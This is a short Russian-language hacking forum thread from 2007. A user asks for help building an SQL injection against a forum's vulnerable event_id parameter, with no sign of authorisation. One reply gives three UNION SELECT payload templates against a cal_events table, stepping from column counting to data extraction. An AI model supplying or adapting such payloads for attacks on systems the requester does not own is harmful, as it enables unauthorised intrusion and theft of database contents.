Помогите составить запрос инъекции

Discussion in 'Песочница' started by FoGorm, 25 Feb 2007.

  1. FoGorm

    FoGorm Elder - Старейшина

    Joined:
    4 Jan 2006
    Messages:
    54
    Likes Received:
    2
    Reputations:
    -1
    Вопрос знающим людям.
    Та вот имею форум с такой уязвимостью. Помогите составить какую-то пробную инъекцию, при помощи этого параметра event_id.
    За ранее благодарен.
     
    #1 FoGorm, 25 Feb 2007
    Last edited: 25 Feb 2007
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    #2 aka PSIH, 26 Feb 2007
    Last edited: 26 Feb 2007
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    1 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100"
    2 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100 from cal_table"
    3 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,column,3,4,...,100 from cal_table"
     
    1 person likes this.